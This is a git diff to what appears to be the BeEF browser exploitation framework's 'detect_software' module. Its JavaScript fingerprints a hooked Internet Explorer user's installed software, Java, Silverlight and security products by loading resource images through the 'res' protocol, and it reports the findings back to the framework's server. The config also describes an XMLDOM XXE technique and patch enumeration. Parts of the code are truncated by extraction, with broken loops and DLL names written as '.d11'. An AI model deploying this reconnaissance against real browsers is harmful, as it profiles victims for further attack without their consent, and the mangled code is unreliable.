https://www.alienvault.com/blogs/labs-research/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi + ["Microsoft Office 97", "Microsoft Office\\OFFICE\\BINDER.EXE/16/1"], + ["Microsoft Office 2000", "Microsoft Office\\OFFICE\\WINWORD.EXE/16/1"], + ["Microsoft Office XP", "Microsoft Office\\OFFICE10\\WINWORD.EXE/16/1"], + ["Microsoft Office 2003", "Microsoft Office\\OFFICE11\\WINWORD.EXE/16/1"], + ["Microsoft Office 2007", "Microsoft Office\\OFFICE12\\WINWORD.EXE/16/1"], + ["Microsoft Office 2010", "Microsoft Office\\OFFICE14\\WINWORD.EXE/16/1"], + ["WPS Office Personal", "Kingsoft\\WPS Office Personal\\utility\\repairinst.exe/16/1"], + ["WPS Office 2008", "Kingsoft\\WPS Office 2008\\utility\\repairinst.exe/16/1"], + ["WPS Office 2009", "Kingsoft\\WPS Office 2009\\utility\\repairinst.exe/16/1"], + ["WPS Office 2010", "Kingsoft\\WPS Office 2010\\utility\\repairinst.exe/16/1"], + ["WinRar 3.5", "WinRAR\\WinRar.exe/6/90"], + ["WinRar 3.6", "WinRAR\\WinRar.exe/6/91"], + ["WinRar 3.7", "WinRAR\\WinRar.exe/6/92"], + ["WinRar 3.8", "WinRAR\\WinRar.exe/6/93"], + ["WinRar 3.9", "WinRAR\\RarExt.d11/24/2"], + ["WinZip", "WinZip\\WinZip32.exe/16/1"], + ["7zip", "7—Zip\\7zFm.exe/16/1"], + ["Adobe Reader 7", "Adobe\\Reader 7.0\\Reader\\AXEParser.d11/16/1"], + ["Adobe Professional 7", "Adobe\\Acrobat 7.0\\Acrobat\\Acrobat.dll/16/1"], + ["Adobe Reader 8", "Adobe\\Reader 8.0\\Reader\\AdobeXMP.d11/16/1"], + ["Adobe Reader 9", "Adobe\\Reader 9.0\\Reader\\AcroRd32.exe/16/1"], + ["Adobe Reader 10", "Adobe\\Reader 10.0\\Reader\\AcroRd32.exe/16/1"], + ["Skype", "Skype\\Phone\\Skype.exe/16/1"], + ["Skype", "Skype\\Phone\\sktransfer.d11/16/1"], + ["Microsoft Outlook 6", "Outlook Express\\msimn.exe/16/1"], + ["Microsoft Outlook 2000", "Microsoft Office\\OFFICE\\OUTLOOK.EXE/16/1"], + ["Microsoft Outlook XP", "Microsoft Office\\OFFICE10\\OUTLOOK.EXE/16/1"], + ["Microsoft Outlook 2003", "Microsoft Office\\OFFICE11\\OUTLOOK.EXE/16/1"], + ["Microsoft Outlook 2007", "Microsoft Office\\OFFICE12\\OUTLOOK.EXE/16/1"], + ["Microsoft Outlook 2010", "Microsoft Office\\OFFICE14\\OUTLOOK.EXE/16/1"], + ["Yahoo Messenger", "Yahoo!\\Messenger\\YahooMessenger.exe/16/1"], + ["Yahoo Messenger 5", "Yahoo!\\Messenger\\YPager.exe/16/1"], + ["Yahoo Messenger 6", "Yahoo!\\Messenger\\asw.d11/16/1"], + ["Yahoo Messenger 7", "Yahoo!\\Messenger\\yxtldr.d11/16/1"], + ["Yahoo Messenger 8", "Yahoo!\\Messenger\\P2PCE.d11/16/1"], + ["Yahoo Messenger 9", "Yahoo!\\Messenger\\GIPSVoiceEngineDLL_MD.d11/16/1"], + ["Yahoo Messenger 10", "Yahoo!\\Messenger\\ConnectionWizard.d11/16/1"], + ["Flashget", "FlashGet\\flashget.exe/16/1"], + ["Flashget", "FlashGet Network\\FlashGet 3\\Flashget3.exe/16/1"], + ["Thunder", "Thunder Network\\Thunder\\Thunder.exe/16/1"], + ["Thunder", "Thunder Network\\Thunder\\Program\\Thunder.exe/16/1"], + ["Thunder", "Thunder Network\\Thunder6\\Thunder.exe/16/1"], + ["eMule", "eMule\\emule.exe/16/1"], + ["eMule", "easyMule2\\easyMule.exe/16/1"], + ["BT", "BitComet\\BitComet.exe/16/1"], + ["QDownload", "Tencent\\QQDownload\\QQDownload.exe/16/1"], + ["BitSpirit", "BitSpirit\\BitSpirit.exe/16/1"], + ["Serv—U", "RhinoSoft.com\\Serv—U\\Serv—U.exe/16/1"], + ["radmin", "Radmin\\radmin.exe/16/1"], + + // The following signatures were taken from AttackAPI + // https://code.google.com/p/attackapi/source/browse/tags/attackapi-2.5.0b/lib/dom/signatures.js + ['L0pht Crack 5', '@stake\\LC5\\lc5.exe/#2/#102'], + ['Adobe Acrobat 7', 'adobe\\acrobat 7.0\\acrobat\\acrobat.dll/#2/#210'], + ['Ahead Nero', 'ahead\\nero\\nero.exe/#2/NEROSESPLASH'], + ['Azureus', 'azureus\\uninstall.exe/#2/#110'], + ['Cain', 'cain\\uninstal.exe/#2/#106'], + ['Citrix', 'Citrix\\icaweb32\\mfc30.dll/#2/#30989'], + ['PGP Desktop', 'PGP Corporation\\PGP Desktop\\PGPdesk.exe/#2/#600'], + ['Google Toolbar', 'Google\\googleToolbar1.dll/#2/#120'], + ['Flash MX 2004', 'Macromedia\\Flash MX 2004\\flash.exe/#2/#4395'], + ['MSN Messenger', 'Messenger\\msmsgs.exe/#2/#607'], + ['Microsoft Live Meeting 7', 'Microsoft Office\\live meeting 7\\console\\7.5.2302.14\\pwresources_zh_tt.dll/#2/#9006'], + ['Microsoft Excel 2003', 'Microsoft Office\\Office11\\excel.exe/#34/#904'], + ['Microsoft Office 2003', 'Microsoft Office\\Office11\\1033\\MSOhelp.exe/#2/201'], + ['Microsoft Visual Studio 8', 'Microsoft Visual Studio 8\\common7\\ide\\devenv.exe/#2/#6606'], + ['Microsoft Movie Maker', 'Movie Maker\\moviemk.exe/RT_JPG/sample1'], + ['Picasa2', 'picasa2\\picasa2.exe/#2/#138'], + ['Quicktime', 'quicktime\\quicktimeplayer.exe/#2/#403'], + ['Real VNC4', 'RealVNC\\VNC4\\vncviewer.exe/#2/#120'], + ['OLE View', 'Resource Kit\\oleview.exe/#2/#2'], + ['Secure CRT', 'SecureCRT\\SecureCRT.exe/#2/#224'], + ['Symantec Antivirus', 'symantec_client_security\\symantec antivirus\\vpc32.exe/#2/#157'], + ['Ultramon', 'ultramon\\ultramondesktop.exe/#2/#108'], + ['VMware Workstation', 'vmware\\vmware workstation\\vmware.exe/#2/#508'], + ['Winamp', 'winamp\\winamp.exe/#2/#109'], + ['Windows Media Player', 'Windows Media Player\\wmsetsdk.exe/#2/#249'] + ]; + + beef.debug("[Detect Software] Enumerating installed software..."); + for (var dir=0;dir", <%= @command_id %>, "installed_software=" + this.title); dom.removeChild(this); } + img.onerror= function() { dom.removeChild(this); } + dom.appendChild(img); + } + } + + // Enumerate Java JDK installs + beef.debug("[Detect Software] Enumerating JDK installs..."); + var java_versions = ['1.8.0', '1.7.0', '1.6.0']; + for (var dir=0;dir", <%= @command_id %>, "installed_software=" + this.title); dom.removeChild(this); } + img.onerror= function() { dom.removeChild(this); } + dom.appendChild(img); + } + } + } + + // Enumerate Silverlight installs + beef.debug("[Detect Software] Enumerating Silverlight installs..."); + var silverlight_versions = [ + '5.1.50901.0', + '5.1.50709.0', + '5.1.50428.0', + '5.1.41212.0', + '5.1.41105.0', + '5.1.40728.0', + '5.1.40416.0', + '5.1.31211.0', + '5.1.30514.0', + '5.1.30214.0', + '5.1.20913.0', + '5.1.20513.0', + '5.1.20125.0', + '5.1.10411.0', + '5.0.61118.0', + '5.0.60818.0', + '5.0.60401.0', + '4.1.10329.0', + '4.1.10111.0', + '4.0.60831.0', + '4.0.60531.0', + '4.0.60310.0', + '4.0.60129.0', + '4.0.51204.0', + '4.0.50917.0', + '4.0.50826.0', + '4.0.50524.00', + '4.0.50401.00', + '3.0.50611.0', + '3.0.50106.00', + '3.0.40818.00', + '3.0.40723.00', + '3.0.40624.00', + '2.0.40115.00', + '2.0.31005.00', + '1.0.30715.00', + '1.0.30401.00', + '1.0.30109.00', + '1.0.21115.00', + '1.0.20816.00' + ]; + + for (var dir=0;dir", <%= @command_id %>, "installed_software=Microsoft Silverlight v" + this.title); dom.removeChild(this); } + img.onerror= function() { dom.removeChild(this); } + dom.appendChild(img); + } + } }); + diff --git a/modules/host/detect_software/config.yaml b/modules/host/detect_software/config.yaml index a6bfd4200..6e04def38 100644 --- a/modules/host/detect_software/config.yaml +++ b/modules/host/detect_software/config.yaml @@ -3,14 +3,15 @@ # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # + beef: module: - Detect_software: + detect_software: enable: true category: "Host" name: "Detect Software" - description: "Detects software installed on the host (Internet Explorer only)" - authors: ["mh"] + description: "This module attempts to detect software installed on the host by using Internet Explorer XMLDOM XXE discovered by Soroush Dalili (@irsdl).

If the XMLDOM XXE technique fails, the module falls back to using the 'res' protocol handler to load known resource images from EXE/DLL files.

It also attempts to enumerate installed patches if service pack uninstall files are present on the host (WinXP only)." + authors: ["bcoles"] target: working: ["IE"] - not_working: ["All"] + not_working: ["ALL"] diff --git a/modules/host/detect_software/module.rb b/modules/host/detect_software/module.rb index 08095c52e..55ccaf1f0 100644 --- a/modules/host/detect_software/module.rb +++ b/modules/host/detect_software/module.rb @@ -3,12 +3,14 @@ # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # + class Detect_software < BeEF::Core::Command - + def post_execute content = {} - content['detect_software'] = @datastore['detect_software'] + content['installed_software'] = @datastore['installed_software'] if not @datastore['installed_software'].nil? + content['installed_patches'] = @datastore['installed_patches'] if not @datastore['installed_patches'].nil? save content end - + end